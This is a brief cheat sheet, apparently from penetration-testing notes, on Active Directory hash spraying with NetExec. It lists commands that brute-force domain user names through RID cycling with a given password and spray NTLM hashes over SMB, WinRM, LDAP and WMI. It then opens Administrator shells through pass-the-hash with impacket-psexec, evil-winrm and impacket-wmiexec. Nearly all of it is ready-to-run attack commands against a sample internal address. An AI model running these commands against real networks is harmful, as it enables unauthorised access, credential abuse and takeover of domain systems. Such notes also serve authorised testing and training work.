Hash Spraying with NetExec

Active Directory AD Attacks linux

Test every hash against every user across every protocol.

Get full user list from the domain

netexec smb 10.10.240.35 -u 'svc_backup' -p 'Autumn2024!' --rid-brute | grep -i 'sidtypeuser' | awk '{print$6}' | cut -d '\' -f2 | tee users.txt

Spray hashes over SMB

netexec smb 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

Over WinRM

netexec winrm 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

Over LDAP

netexec ldap 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

Over WMI

netexec wmi 10.10.240.35 -u users.txt -H unique_hashes.txt --continue-on-success

The --continue-on-success flag is critical - by default NetExec stops on first hit.

Get a shell with the validated hash

impacket-psexec intranet.local/Administrator@10.10.240.35 -hashes :a7f3e2b14d9058c6e8b720f5d1c93ea4
evil-winrm -u Administrator -H 'a7f3e2b14d9058c6e8b720f5d1c93ea4' -i 10.10.240.35
impacket-wmiexec intranet.local/Administrator@10.10.240.35 -hashes :a7f3e2b14d9058c6e8b720f5d1c93ea4